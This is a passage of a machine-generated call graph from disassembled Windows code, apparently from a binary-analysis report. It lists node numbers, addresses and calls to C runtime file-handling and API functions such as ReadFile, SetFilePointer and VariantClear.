87104->87135 87107 41d23a 87106->87107 87108 41d255 87107->87108 87120 41d26c __wopenfile 87107->87120 87140 417f77 46 API calls __getptd_noexit 87108->87140 87110 41d421 87113 41d47a 87110->87113 87114 41d48c 87110->87114 87111 41d25a 87141 417f25 10 API calls _xtow_s@20 87111->87141 87145 417f77 46 API calls __getptd_noexit 87113->87145 87137 422bf9 87114->87137 87117 41499d 87130 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87117->87130 87118 41d47f 87146 417f25 10 API calls _xtow_s@20 87118->87146 87120->87110 87120->87113 87120->87120 87142 41341f 58 API calls 2 library calls 87120->87142 87122 41d41a 87122->87110 87143 41341f 58 API calls 2 library calls 87122->87143 87124 41d439 87124->87110 87144 41341f 58 API calls 2 library calls 87124->87144 87126->87074 87127->87084 87128->87084 87129->87084 87130->87084 87136 4181f2 LeaveCriticalSection 87131->87136 87133 41d602 87133->87097 87134->87104 87135->87104 87136->87133 87147 422b35 87137->87147 87139 422c14 87139->87117 87140->87111 87141->87117 87142->87122 87143->87124 87144->87110 87145->87118 87146->87117 87148 422b41 __tsopen_nolock 87147->87148 87149 422b54 87148->87149 87151 422b8a 87148->87151 87150 417f77 _xtow_s@20 46 API calls 87149->87150 87152 422b59 87150->87152 87154 422400 __tsopen_nolock 109 API calls 87151->87154 87153 417f25 _xtow_s@20 10 API calls 87152->87153 87157 422b63 __tsopen_nolock 87153->87157 87155 422ba4 87154->87155 87156 422bcb __wsopen_helper LeaveCriticalSection 87155->87156 87156->87157 87157->87139 87161 4150dd __tsopen_nolock 87158->87161 87159 4150e9 87189 417f77 46 API calls __getptd_noexit 87159->87189 87161->87159 87162 41510f 87161->87162 87171 415471 87162->87171 87163 4150ee 87190 417f25 10 API calls _xtow_s@20 87163->87190 87170 4150f9 __tsopen_nolock 87170->87015 87172 415483 87171->87172 87173 4154a5 EnterCriticalSection 87171->87173 87172->87173 87174 41548b 87172->87174 87175 415117 87173->87175 87176 4182cb __lock 46 API calls 87174->87176 87177 415047 87175->87177 87176->87175 87178 415067 87177->87178 87179 415057 87177->87179 87184 415079 87178->87184 87192 414e4e 87178->87192 87247 417f77 46 API calls __getptd_noexit 87179->87247 87183 41505c 87191 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87183->87191 87209 41443c 87184->87209 87187 4150b9 87222 41e1f4 87187->87222 87189->87163 87190->87170 87191->87170 87193 414e61 87192->87193 87194 414e79 87192->87194 87248 417f77 46 API calls __getptd_noexit 87193->87248 87196 414139 __fputwc_nolock 46 API calls 87194->87196 87198 414e80 87196->87198 87197 414e66 87249 417f25 10 API calls _xtow_s@20 87197->87249 87200 41e1f4 __write 51 API calls 87198->87200 87201 414e97 87200->87201 87202 414f09 87201->87202 87204 414ec9 87201->87204 87208 414e71 87201->87208 87250 417f77 46 API calls __getptd_noexit 87202->87250 87205 41e1f4 __write 51 API calls 87204->87205 87204->87208 87206 414f64 87205->87206 87207 41e1f4 __write 51 API calls 87206->87207 87206->87208 87207->87208 87208->87184 87210 414455 87209->87210 87214 414477 87209->87214 87211 414139 __fputwc_nolock 46 API calls 87210->87211 87210->87214 87212 414470 87211->87212 87251 41b7b2 77 API calls 5 library calls 87212->87251 87215 414139 87214->87215 87216 414145 87215->87216 87217 41415a 87215->87217 87252 417f77 46 API calls __getptd_noexit 87216->87252 87217->87187 87219 41414a 87253 417f25 10 API calls _xtow_s@20 87219->87253 87221 414155 87221->87187 87223 41e200 __tsopen_nolock 87222->87223 87224 41e223 87223->87224 87225 41e208 87223->87225 87226 41e22f 87224->87226 87232 41e269 87224->87232 87274 417f8a 46 API calls __getptd_noexit 87225->87274 87276 417f8a 46 API calls __getptd_noexit 87226->87276 87229 41e20d 87275 417f77 46 API calls __getptd_noexit 87229->87275 87231 41e234 87277 417f77 46 API calls __getptd_noexit 87231->87277 87254 41ae56 87232->87254 87235 41e23c 87278 417f25 10 API calls _xtow_s@20 87235->87278 87236 41e26f 87237 41e291 87236->87237 87238 41e27d 87236->87238 87279 417f77 46 API calls __getptd_noexit 87237->87279 87264 41e17f 87238->87264 87242 41e215 __tsopen_nolock 87242->87183 87243 41e289 87281 41e2c0 LeaveCriticalSection __unlock_fhandle 87243->87281 87244 41e296 87280 417f8a 46 API calls __getptd_noexit 87244->87280 87247->87183 87248->87197 87249->87208 87250->87208 87251->87214 87252->87219 87253->87221 87255 41ae62 __tsopen_nolock 87254->87255 87256 41aebc 87255->87256 87258 4182cb __lock 46 API calls 87255->87258 87257 41aec1 EnterCriticalSection 87256->87257 87260 41aede __tsopen_nolock 87256->87260 87257->87260 87259 41ae8e 87258->87259 87261 41aeaa 87259->87261 87262 41ae97 InitializeCriticalSectionAndSpinCount 87259->87262 87260->87236 87263 41aeec ___lock_fhandle LeaveCriticalSection 87261->87263 87262->87261 87263->87256 87265 41aded __close_nolock 46 API calls 87264->87265 87266 41e18e 87265->87266 87267 41e1a4 SetFilePointer 87266->87267 87268 41e194 87266->87268 87270 41e1c3 87267->87270 87271 41e1bb GetLastError 87267->87271 87269 417f77 _xtow_s@20 46 API calls 87268->87269 87272 41e199 87269->87272 87270->87272 87273 417f9d __dosmaperr 46 API calls 87270->87273 87271->87270 87272->87243 87273->87272 87274->87229 87275->87242 87276->87231 87277->87235 87278->87242 87279->87244 87280->87243 87281->87242 87283 4149ea 87282->87283 87284 4149fe 87282->87284 87328 417f77 46 API calls __getptd_noexit 87283->87328 87286 4149fa 87284->87286 87288 41443c __flush 77 API calls 87284->87288 87300 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87286->87300 87287 4149ef 87329 417f25 10 API calls _xtow_s@20 87287->87329 87290 414a0a 87288->87290 87301 41d8c2 87290->87301 87293 414139 __fputwc_nolock 46 API calls 87294 414a18 87293->87294 87305 41d7fe 87294->87305 87296 414a1e 87296->87286 87297 413748 _free 46 API calls 87296->87297 87297->87286 87298->87029 87299->87032 87300->87032 87302 414a12 87301->87302 87303 41d8d2 87301->87303 87302->87293 87303->87302 87304 413748 _free 46 API calls 87303->87304 87304->87302 87306 41d80a __tsopen_nolock 87305->87306 87307 41d812 87306->87307 87308 41d82d 87306->87308 87345 417f8a 46 API calls __getptd_noexit 87307->87345 87309 41d839 87308->87309 87314 41d873 87308->87314 87347 417f8a 46 API calls __getptd_noexit 87309->87347 87312 41d817 87346 417f77 46 API calls __getptd_noexit 87312->87346 87313 41d83e 87348 417f77 46 API calls __getptd_noexit 87313->87348 87317 41ae56 ___lock_fhandle 48 API calls 87314->87317 87319 41d879 87317->87319 87318 41d846 87349 417f25 10 API calls _xtow_s@20 87318->87349 87322 41d893 87319->87322 87323 41d887 87319->87323 87320 41d81f __tsopen_nolock 87320->87296 87350 417f77 46 API calls __getptd_noexit 87322->87350 87330 41d762 87323->87330 87326 41d88d 87351 41d8ba LeaveCriticalSection __unlock_fhandle 87326->87351 87328->87287 87329->87286 87352 41aded 87330->87352 87332 41d7c8 87365 41ad67 47 API calls 2 library calls 87332->87365 87334 41d772 87334->87332 87336 41aded __close_nolock 46 API calls 87334->87336 87344 41d7a6 87334->87344 87335 41d7d0 87338 41d7f2 87335->87338 87366 417f9d 46 API calls 3 library calls 87335->87366 87339 41d79d 87336->87339 87337 41aded __close_nolock 46 API calls 87340 41d7b2 CloseHandle 87337->87340 87338->87326 87342 41aded __close_nolock 46 API calls 87339->87342 87340->87332 87343 41d7be GetLastError 87340->87343 87342->87344 87343->87332 87344->87332 87344->87337 87345->87312 87346->87320 87347->87313 87348->87318 87349->87320 87350->87326 87351->87320 87353 41adfa 87352->87353 87355 41ae12 87352->87355 87354 417f8a __tsopen_nolock 46 API calls 87353->87354 87356 41adff 87354->87356 87357 417f8a __tsopen_nolock 46 API calls 87355->87357 87358 41ae51 87355->87358 87359 417f77 _xtow_s@20 46 API calls 87356->87359 87360 41ae23 87357->87360 87358->87334 87361 41ae07 87359->87361 87362 417f77 _xtow_s@20 46 API calls 87360->87362 87361->87334 87363 41ae2b 87362->87363 87364 417f25 _xtow_s@20 10 API calls 87363->87364 87364->87361 87365->87335 87366->87338 87368 414c82 __tsopen_nolock 87367->87368 87369 414cc3 87368->87369 87370 414c96 __crtGetStringTypeA_stat 87368->87370 87371 414cbb __tsopen_nolock 87368->87371 87372 415471 __lock_file 47 API calls 87369->87372 87394 417f77 46 API calls __getptd_noexit 87370->87394 87371->87038 87374 414ccb 87372->87374 87380 414aba 87374->87380 87375 414cb0 87395 417f25 10 API calls _xtow_s@20 87375->87395 87381 414af2 87380->87381 87385 414ad8 __crtGetStringTypeA_stat 87380->87385 87396 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87381->87396 87382 414ae2 87447 417f77 46 API calls __getptd_noexit 87382->87447 87384 414ae7 87448 417f25 10 API calls _xtow_s@20 87384->87448 87385->87381 87385->87382 87389 414b2d 87385->87389 87388 414c38 __crtGetStringTypeA_stat 87450 417f77 46 API calls __getptd_noexit 87388->87450 87389->87381 87389->87388 87391 414139 __fputwc_nolock 46 API calls 87389->87391 87397 41dfcc 87389->87397 87427 41d8f3 87389->87427 87449 41e0c2 46 API calls 3 library calls 87389->87449 87391->87389 87394->87375 87395->87371 87396->87371 87398 41dfd8 __tsopen_nolock 87397->87398 87399 41dfe0 87398->87399 87400 41dffb 87398->87400 87520 417f8a 46 API calls __getptd_noexit 87399->87520 87402 41e007 87400->87402 87405 41e041 87400->87405 87522 417f8a 46 API calls __getptd_noexit 87402->87522 87403 41dfe5 87521 417f77 46 API calls __getptd_noexit 87403->87521 87408 41e063 87405->87408 87409 41e04e 87405->87409 87407 41e00c 87523 417f77 46 API calls __getptd_noexit 87407->87523 87412 41ae56 ___lock_fhandle 48 API calls 87408->87412 87525 417f8a 46 API calls __getptd_noexit 87409->87525 87415 41e069 87412->87415 87413 41e014 87524 417f25 10 API calls _xtow_s@20 87413->87524 87414 41e053 87526 417f77 46 API calls __getptd_noexit 87414->87526 87419 41e077 87415->87419 87420 41e08b 87415->87420 87418 41dfed __tsopen_nolock 87418->87389 87451 41da15 87419->87451 87527 417f77 46 API calls __getptd_noexit 87420->87527 87423 41e090 87528 417f8a 46 API calls __getptd_noexit 87423->87528 87424 41e083 87529 41e0ba LeaveCriticalSection __unlock_fhandle 87424->87529 87428 41d900 87427->87428 87431 41d915 87427->87431 87533 417f77 46 API calls __getptd_noexit 87428->87533 87430 41d905 87534 417f25 10 API calls _xtow_s@20 87430->87534 87433 41d94a 87431->87433 87438 41d910 87431->87438 87530 420603 87431->87530 87435 414139 __fputwc_nolock 46 API calls 87433->87435 87436 41d95e 87435->87436 87437 41dfcc __read 59 API calls 87436->87437 87439 41d965 87437->87439 87438->87389 87439->87438 87440 414139 __fputwc_nolock 46 API calls 87439->87440 87441 41d988 87440->87441 87441->87438 87442 414139 __fputwc_nolock 46 API calls 87441->87442 87443 41d994 87442->87443 87443->87438 87444 414139 __fputwc_nolock 46 API calls 87443->87444 87445 41d9a1 87444->87445 87446 414139 __fputwc_nolock 46 API calls 87445->87446 87446->87438 87447->87384 87448->87381 87449->87389 87450->87384 87452 41da31 87451->87452 87453 41da4c 87451->87453 87454 417f8a __tsopen_nolock 46 API calls 87452->87454 87455 41da5b 87453->87455 87457 41da7a 87453->87457 87456 41da36 87454->87456 87458 417f8a __tsopen_nolock 46 API calls 87455->87458 87459 417f77 _xtow_s@20 46 API calls 87456->87459 87461 41da98 87457->87461 87474 41daac 87457->87474 87460 41da60 87458->87460 87463 41da3e 87459->87463 87465 417f77 _xtow_s@20 46 API calls 87460->87465 87462 417f8a __tsopen_nolock 46 API calls 87461->87462 87466 41da9d 87462->87466 87463->87424 87464 41db02 87468 417f8a __tsopen_nolock 46 API calls 87464->87468 87467 41da67 87465->87467 87470 417f77 _xtow_s@20 46 API calls 87466->87470 87471 417f25 _xtow_s@20 10 API calls 87467->87471 87469 41db07 87468->87469 87472 417f77 _xtow_s@20 46 API calls 87469->87472 87473 41daa4 87470->87473 87471->87463 87472->87473 87476 417f25 _xtow_s@20 10 API calls 87473->87476 87474->87463 87474->87464 87475 41dae1 87474->87475 87478 41db1b 87474->87478 87475->87464 87477 41daec ReadFile 87475->87477 87476->87463 87482 41dc17 87477->87482 87483 41df8f GetLastError 87477->87483 87480 416b04 __malloc_crt 46 API calls 87478->87480 87481 41db31 87480->87481 87485 41db59 87481->87485 87486 41db3b 87481->87486 87482->87483 87487 41dc2b 87482->87487 87484 41df9c 87483->87484 87491 41de16 87483->87491 87489 417f77 _xtow_s@20 46 API calls 87484->87489 87488 420494 __lseeki64_nolock 48 API calls 87485->87488 87490 417f77 _xtow_s@20 46 API calls 87486->87490 87499 41dd9b 87487->87499 87501 41de5b 87487->87501 87502 41dc47 87487->87502 87492 41db67 87488->87492 87493 41dfa1 87489->87493 87494 41db40 87490->87494 87495 417f9d __dosmaperr 46 API calls 87491->87495 87491->87499 87492->87477 87496 417f8a __tsopen_nolock 46 API calls 87493->87496 87497 417f8a __tsopen_nolock 46 API calls 87494->87497 87495->87499 87496->87499 87497->87463 87498 413748 _free 46 API calls 87498->87463 87499->87463 87499->87498 87500 41ded0 ReadFile 87505 41deef GetLastError 87500->87505 87512 41def9 87500->87512 87501->87499 87501->87500 87503 41dcab ReadFile 87502->87503 87508 41dd28 87502->87508 87504 41dcc9 GetLastError 87503->87504 87511 41dcd3 87503->87511 87504->87502 87504->87511 87505->87501 87505->87512 87506 41ddec MultiByteToWideChar 87506->87499 87507 41de10 GetLastError 87506->87507 87507->87491 87508->87499 87509 41dda3 87508->87509 87510 41dd96 87508->87510 87514 41dd60 87508->87514 87509->87514 87515 41ddda 87509->87515 87513 417f77 _xtow_s@20 46 API calls 87510->87513 87511->87502 87516 420494 __lseeki64_nolock 48 API calls 87511->87516 87512->87501 87517 420494 __lseeki64_nolock 48 API calls 87512->87517 87513->87499 87514->87506 87518 420494 __lseeki64_nolock 48 API calls 87515->87518 87516->87511 87517->87512 87519 41dde9 87518->87519 87519->87506 87520->87403 87521->87418 87522->87407 87523->87413 87524->87418 87525->87414 87526->87413 87527->87423 87528->87424 87529->87418 87531 416b04 __malloc_crt 46 API calls 87530->87531 87532 420618 87531->87532 87532->87433 87533->87430 87534->87438 87538 4148b3 GetSystemTimeAsFileTime __aulldiv 87535->87538 87537 442c6b 87537->87041 87538->87537 87539->87048 87540->87053 87541->87053 87547 45272f __tzset_nolock _wcscpy 87542->87547 87543 414d04 61 API calls __fread_nolock 87543->87547 87544 44afef GetSystemTimeAsFileTime 87544->87547 87545 4528a4 87545->86963 87545->86964 87546 4150d1 81 API calls _fseek 87546->87547 87547->87543 87547->87544 87547->87545 87547->87546 87549 44b1bc 87548->87549 87550 44b1ca 87548->87550 87551 4149c2 116 API calls 87549->87551 87552 44b1e1 87550->87552 87553 4149c2 116 API calls 87550->87553 87554 44b1d8 87550->87554 87551->87550 87583 4321a4 87552->87583 87555 44b2db 87553->87555 87554->86990 87555->87552 87557 44b2e9 87555->87557 87559 44b2f6 87557->87559 87562 414a46 __fcloseall 82 API calls 87557->87562 87558 44b224 87560 44b253 87558->87560 87561 44b228 87558->87561 87559->86990 87587 43213d 87560->87587 87564 44b235 87561->87564 87565 414a46 __fcloseall 82 API calls 87561->87565 87562->87559 87566 44b245 87564->87566 87568 414a46 __fcloseall 82 API calls 87564->87568 87565->87564 87566->86990 87567 44b25a 87569 44b260 87567->87569 87570 44b289 87567->87570 87568->87566 87572 44b26d 87569->87572 87574 414a46 __fcloseall 82 API calls 87569->87574 87597 44b0bf 87 API calls 87570->87597 87575 44b27d 87572->87575 87576 414a46 __fcloseall 82 API calls 87572->87576 87573 44b28f 87598 4320f8 46 API calls _free 87573->87598 87574->87572 87575->86990 87576->87575 87578 44b295 87579 414a46 __fcloseall 82 API calls 87578->87579 87581 44b2a2 87578->87581 87579->87581 87580 44b2b2 87580->86990 87581->87580 87582 414a46 __fcloseall 82 API calls 87581->87582 87582->87580 87584 4321cb 87583->87584 87586 4321b4 __tzset_nolock _memmove 87583->87586 87585 414d04 __fread_nolock 61 API calls 87584->87585 87585->87586 87586->87558 87588 4135bb _malloc 46 API calls 87587->87588 87589 432150 87588->87589 87590 4135bb _malloc 46 API calls 87589->87590 87591 432162 87590->87591 87592 4135bb _malloc 46 API calls 87591->87592 87593 432174 87592->87593 87595 432189 87593->87595 87599 4320f8 46 API calls _free 87593->87599 87595->87567 87596 432198 87596->87567 87597->87573 87598->87578 87599->87596 87600->86893 87601->86895 87602->86913 87603->86913 87604->86913 87605->86906 87606->86913 87607->86913 87608->86918 87609->86927 87610->86928 87611->86928 87661 410160 87612->87661 87614 41012f GetFullPathNameW 87615 410147 ctype 87614->87615 87615->86749 87617 4102cb SHGetDesktopFolder 87616->87617 87620 410333 _wcsncpy 87616->87620 87618 4102e0 _wcsncpy 87617->87618 87617->87620 87619 41031c SHGetPathFromIDListW 87618->87619 87618->87620 87619->87620 87620->86752 87622 4101bb 87621->87622 87627 425f4a 87621->87627 87623 410160 52 API calls 87622->87623 87624 4101c7 87623->87624 87665 410200 52 API calls 2 library calls 87624->87665 87625 4114ab __wcsicoll 58 API calls 87625->87627 87627->87625 87629 425f6e 87627->87629 87628 4101d6 87666 410200 52 API calls 2 library calls 87628->87666 87629->86754 87631 4101e9 87631->86754 87633 40f760 128 API calls 87632->87633 87634 40f584 87633->87634 87635 429335 87634->87635 87636 40f58c 87634->87636 87639 4528bd 118 API calls 87635->87639 87637 40f598 87636->87637 87638 429358 87636->87638 87691 4033c0 113 API calls 7 library calls 87637->87691 87692 434034 86 API calls _wprintf 87638->87692 87641 42934b 87639->87641 87644 429373 87641->87644 87645 42934f 87641->87645 87643 40f5b4 87643->86750 87648 4115d7 52 API calls 87644->87648 87647 431e58 82 API calls 87645->87647 87646 429369 87646->87644 87647->87638 87660 4293c5 ctype 87648->87660 87649 42959c 87650 413748 _free 46 API calls 87649->87650 87651 4295a5 87650->87651 87652 431e58 82 API calls 87651->87652 87653 4295b1 87652->87653 87657 401b10 52 API calls 87657->87660 87660->87649 87660->87657 87667 444af8 87660->87667 87670 44b41c 87660->87670 87677 402780 87660->87677 87685 4022d0 87660->87685 87693 44c7dd 64 API calls 3 library calls 87660->87693 87662 410167 _wcslen 87661->87662 87663 4115d7 52 API calls 87662->87663 87664 41017e _wcscpy 87663->87664 87664->87614 87665->87628 87666->87631 87668 4115d7 52 API calls 87667->87668 87669 444b27 _memmove 87668->87669 87669->87660 87671 44b429 87670->87671 87672 4115d7 52 API calls 87671->87672 87673 44b440 87672->87673 87674 44b45e 87673->87674 87675 401b10 52 API calls 87673->87675 87674->87660 87676 44b453 87675->87676 87676->87660 87678 402790 ctype _memmove 87677->87678 87679 402827 87677->87679 87680 4115d7 52 API calls 87678->87680 87681 4115d7 52 API calls 87679->87681 87682 402797 87680->87682 87681->87678 87683 4027bd 87682->87683 87684 4115d7 52 API calls 87682->87684 87683->87660 87684->87683 87686 4022e0 87685->87686 87688 40239d 87685->87688 87687 4115d7 52 API calls 87686->87687 87686->87688 87690 402320 ctype 87686->87690 87687->87690 87688->87660 87689 4115d7 52 API calls 87689->87690 87690->87688 87690->87689 87691->87643 87692->87646 87693->87660 87695 402417 87694->87695 87699 402539 ctype 87694->87699 87696 4115d7 52 API calls 87695->87696 87695->87699 87697 402443 87696->87697 87698 4115d7 52 API calls 87697->87698 87700 4024b4 87698->87700 87699->86758 87700->87699 87702 4022d0 52 API calls 87700->87702 87723 402880 95 API calls 2 library calls 87700->87723 87702->87700 87707 401566 87703->87707 87704 401794 87724 40e9a0 90 API calls 87704->87724 87707->87704 87708 40167a 87707->87708 87709 4010a0 52 API calls 87707->87709 87710 4017c0 87708->87710 87725 45e737 90 API calls 3 library calls 87708->87725 87709->87707 87710->86760 87712 40bc70 52 API calls 87711->87712 87713 40d451 87712->87713 87714 40d50f 87713->87714 87716 40e0a0 52 API calls 87713->87716 87717 427c01 87713->87717 87719 401b10 52 API calls 87713->87719 87720 40d519 87713->87720 87726 40f310 53 API calls 87713->87726 87727 40d860 91 API calls 87713->87727 87728 410600 52 API calls 87714->87728 87716->87713 87729 45e737 90 API calls 3 library calls 87717->87729 87719->87713 87720->86763 87723->87700 87724->87708 87725->87710 87726->87713 87727->87713 87728->87720 87729->87720 87730->86776 87731->86777 87733 42c5fe 87732->87733 87785 4091c6 87732->87785 87734 40bc70 52 API calls 87733->87734 87733->87785 87735 42c64e InterlockedIncrement 87734->87735 87736 42c665 87735->87736 87741 42c697 87735->87741 87738 42c672 InterlockedDecrement Sleep InterlockedIncrement 87736->87738 87736->87741 87737 42c737 InterlockedDecrement 87739 42c74a 87737->87739 87738->87736 87738->87741 87742 408f40 VariantClear 87739->87742 87740 42c731 87740->87737 87741->87737 87741->87740 88025 408e80 87741->88025 87744 42c752 87742->87744 88034 410c60 VariantClear ctype 87744->88034 87748 42c6db 87749 402160 52 API calls 87748->87749 87750 42c6e5 87749->87750 88030 45340c 85 API calls 87750->88030 87752 42c6f1 88031 40d200 52 API calls 2 library calls 87752->88031 87754 42c6fb 88032 465124 53 API calls 87754->88032 87756 42c715 87757 42c76a 87756->87757 87758 42c719 87756->87758 87759 401b10 52 API calls 87757->87759 88033 46fe32 VariantClear 87758->88033 87761 42c77e 87759->87761 87762 401980 53 API calls 87761->87762 87768 42c796 87762->87768 87763 42c812 88036 46fe32 VariantClear 87763->88036 87765 42c82a InterlockedDecrement 88037 46ff07 54 API calls 87765->88037 87767 42c864 88038 45e737 90 API calls 3 library calls 87767->88038 87768->87763 87768->87767 88035 40ba10 52 API calls 2 library calls 87768->88035 87770 42c9ec 88081 47d33e 331 API calls 87770->88081 87773 42c9fe 88082 46feb1 VariantClear VariantClear 87773->88082 87775 408f40 VariantClear 87786 42c849 87775->87786 87776 42ca08 87777 401b10 52 API calls 87776->87777 87780 42ca15 87777->87780 87778 408f40 VariantClear 87781 42c891 87778->87781 87779 402780 52 API calls 87779->87786 88039 410c60 VariantClear ctype 87781->88039 87784 401980 53 API calls 87784->87786 87785->86839 87786->87770 87786->87775 87786->87779 87786->87784 88040 40a780 87786->88040 87787 42c874 87787->87778 87789 42ca59 87787->87789 87789->87789 87791 40afc4 87790->87791 87792 40b156 87790->87792 87793 40afd5 87791->87793 87794 42d1e3 87791->87794 88092 45e737 90 API calls 3 library calls 87792->88092 87799 40a780 194 API calls 87793->87799 87815 40b11a ctype 87793->87815 88093 45e737 90 API calls 3 library calls 87794->88093 87797 42d1f8 87803 408f40 VariantClear 87797->87803 87798 40b143 87798->86839 87800 40b00a 87799->87800 87800->87797 87804 40b012 87800->87804 87802 42d4db 87802->87802 87803->87798 87805 40b04a 87804->87805 87806 40b094 ctype 87804->87806 87808 42d231 VariantClear 87804->87808 87810 40b05c ctype 87805->87810 88094 40e270 VariantClear ctype 87805->88094 87807 40b108 87806->87807 87811 42d425 ctype 87806->87811 87807->87815 88095 40e270 VariantClear ctype 87807->88095 87808->87810 87809 42d45a VariantClear 87809->87815 87810->87806 87814 4115d7 52 API calls 87810->87814 87811->87809 87811->87815 87814->87806 87815->87798 88096 45e737 90 API calls 3 library calls 87815->88096 87817 40900d 87816->87817 87818 408fff 87816->87818 87821 42c3f6 87817->87821 87823 42c44a 87817->87823 87824 40a780 194 API calls 87817->87824 87827 42c47b 87817->87827 87829 42c4cb 87817->87829 87830 42c564 87817->87830 87835 42c548 87817->87835 87836 409112 87817->87836 87838 42c528 87817->87838 87840 4090df 87817->87840 87841 4090ea 87817->87841 87850 4090f2 ctype 87817->87850 88099 4534e3 52 API calls 87817->88099 88101 40c4e0 194 API calls 87817->88101 88097 403ea0 52 API calls __cinit 87818->88097 88100 45e737 90 API calls 3 library calls 87821->88100 88102 45e737 90 API calls 3 library calls 87823->88102 87824->87817 88103 451b42 61 API calls 87827->88103 88105 47faae 233 API calls 87829->88105 87833 408f40 VariantClear 87830->87833 87831 42c491 87831->87850 88104 45e737 90 API calls 3 library calls 87831->88104 87833->87850 87834 42c4da 87834->87850 88106 45e737 90 API calls 3 library calls 87834->88106 88108 45e737 90 API calls 3 library calls 87835->88108 87836->87835 87843 40912b 87836->87843 88107 45e737 90 API calls 3 library calls 87838->88107 87840->87841 87845 408e80 VariantClear 87840->87845 87846 408f40 VariantClear 87841->87846 87843->87850 88098 403e10 53 API calls 87843->88098 87845->87841 87846->87850 87848 40914b 87849 408f40 VariantClear 87848->87849 87849->87850 87850->86839 88109 408d90 87851->88109 87853 429778 88136 410c60 VariantClear ctype 87853->88136 87855 429780 87856 408cf9 87856->87853 87857 42976c 87856->87857 87859 408d2d 87856->87859 88135 45e737 90 API calls 3 library calls 87857->88135 88125 403d10 87859->88125 87862 408d71 ctype 87862->86839 87863 408f40 VariantClear 87864 408d45 ctype 87863->87864 87864->87862 87864->87863 87866 425c87 87865->87866 87867 40d15f 87865->87867 87868 425cc7 87866->87868 87869 425ca1 TranslateAcceleratorW 87866->87869 87867->86839 87869->87867 87871 42602f 87870->87871 87872 40d17f 87870->87872 87871->86839 87873 40d18c 87872->87873 87874 42608e IsDialogMessageW 87872->87874 88434 430c46 GetClassLongW 87872->88434 87873->86839 87874->87872 87874->87873 87877 4096c6 _wcslen 87876->87877 87878 4115d7 52 API calls 87877->87878 87927 40a70c ctype _memmove 87877->87927 87879 4096fa _memmove 87878->87879 87881 4115d7 52 API calls 87879->87881 87880 4013a0 52 API calls 87882 4297aa 87880->87882 87883 40971b 87881->87883 87884 4115d7 52 API calls 87882->87884 87885 409749 CharUpperBuffW 87883->87885 87888 40976a ctype 87883->87888 87883->87927 87887 4297d1 _memmove 87884->87887 87885->87888 88462 45e737 90 API calls 3 library calls 87887->88462 87921 4097e5 ctype 87888->87921 88436 47dcbb 196 API calls 87888->88436 87890 408f40 VariantClear 87891 42ae92 87890->87891 88463 410c60 VariantClear ctype 87891->88463 87893 42aea4 87894 409aa2 87894->87887 87896 4115d7 52 API calls 87894->87896 87899 409afe 87894->87899 87895 40a689 87897 4115d7 52 API calls 87895->87897 87896->87899 87913 40a6af ctype _memmove 87897->87913 87898 40c2c0 52 API calls 87898->87921 87900 409b2a 87899->87900 87901 4115d7 52 API calls 87899->87901 87903 429dbe 87900->87903 87969 409b4d ctype _memmove 87900->87969 88444 40b400 VariantClear VariantClear ctype 87900->88444 87902 429d31 87901->87902 87904 429d42 87902->87904 88441 44a801 52 API calls 87902->88441 87906 429dd3 87903->87906 88445 40b400 VariantClear VariantClear ctype 87903->88445 87918 40e0a0 52 API calls 87904->87918 87906->87969 88446 40e1c0 VariantClear ctype 87906->88446 87907 429a46 VariantClear 87907->87921 87909 40a045 87915 4115d7 52 API calls 87909->87915 87910 42a3f5 88449 47390f VariantClear 87910->88449 87911 408f40 VariantClear 87911->87921 87920 4115d7 52 API calls 87913->87920 87922 40a04c 87915->87922 87917 4115d7 52 API calls 87917->87921 87923 429d57 87918->87923 87920->87927 87921->87887 87921->87894 87921->87895 87921->87898 87921->87907 87921->87911 87921->87913 87921->87917 87928 4299d9 87921->87928 87932 429abd 87921->87932 87940 40a780 194 API calls 87921->87940 87945 42a452 87921->87945 88437 40c4e0 194 API calls 87921->88437 88439 40ba10 52 API calls 2 library calls 87921->88439 88440 40e270 VariantClear ctype 87921->88440 87930 4091e0 317 API calls 87922->87930 87941 40a0a7 87922->87941 88442 453443 52 API calls 87923->88442 87925 42a42f 88450 45e737 90 API calls 3 library calls 87925->88450 87927->87880 87931 408f40 VariantClear 87928->87931 87930->87941 87939 4299e2 87931->87939 87932->86839 87933 429d88 88443 453443 52 API calls 87933->88443 88438 410c60 VariantClear ctype 87939->88438 87940->87921 87948 40a0af 87941->87948 88451 40c790 VariantClear ctype 87941->88451 87942 44a801 52 API calls 87942->87969 87944 408f40 VariantClear 87976 40a162 ctype _memmove 87944->87976 87945->87890 87946 41130a 51 API calls __cinit 87946->87969 87947 402780 52 API calls 87947->87969 87949 40a11b 87948->87949 87950 42a4b4 VariantClear 87948->87950 87948->87976 87956 40a12d ctype 87949->87956 88452 40e270 VariantClear ctype 87949->88452 87950->87956 87951 40a780 194 API calls 87951->87969 87952 408e80 VariantClear 87952->87969 87954 401980 53 API calls 87954->87969 87955 4115d7 52 API calls 87955->87976 87956->87955 87956->87976 87957 408e80 VariantClear 87957->87976 87959 42a74d VariantClear 87959->87976 87960 4115d7 52 API calls 87960->87969 87961 40a368 87963 42aad4 87961->87963 87971 40a397 87961->87971 87962 40e270 VariantClear 87962->87976 88455 46fe90 VariantClear VariantClear ctype 87963->88455 87964 409fd2 87964->87909 87964->87910 87965 42a7e4 VariantClear 87965->87976 87966 42a886 VariantClear 87966->87976 87968 409c95 87968->86839 87969->87910 87969->87925 87969->87927 87969->87942 87969->87946 87969->87947 87969->87951 87969->87952 87969->87954 87969->87960 87969->87964 87969->87968 88447 45f508 52 API calls 87969->88447 88448 403e10 53 API calls 87969->88448 87970 40a3ce 87983 40a3d9 ctype 87970->87983 88456 40b400 VariantClear VariantClear ctype 87970->88456 87971->87970 87996 40a42c ctype 87971->87996 88435 40b400 VariantClear VariantClear ctype 87971->88435 87974 42abaf 87979 42abd4 VariantClear 87974->87979 87990 40a4ee ctype 87974->87990 87975 4115d7 52 API calls 87975->87976 87976->87944 87976->87957 87976->87959 87976->87961 87976->87962 87976->87963 87976->87965 87976->87966 87976->87975 87978 4115d7 52 API calls 87976->87978 88453 470870 52 API calls 87976->88453 88454 44ccf1 VariantClear ctype 87976->88454 87977 40a4dc 87977->87990 88458 40e270 VariantClear ctype 87977->88458 87980 42a5a6 VariantInit VariantCopy 87978->87980 87979->87990 87980->87976 87985 42a5c6 VariantClear 87980->87985 87981 42ac4f 87989 42ac79 VariantClear 87981->87989 87994 40a546 ctype 87981->87994 87984 40a41a 87983->87984 87987 42ab44 VariantClear 87983->87987 87983->87996 87984->87996 88457 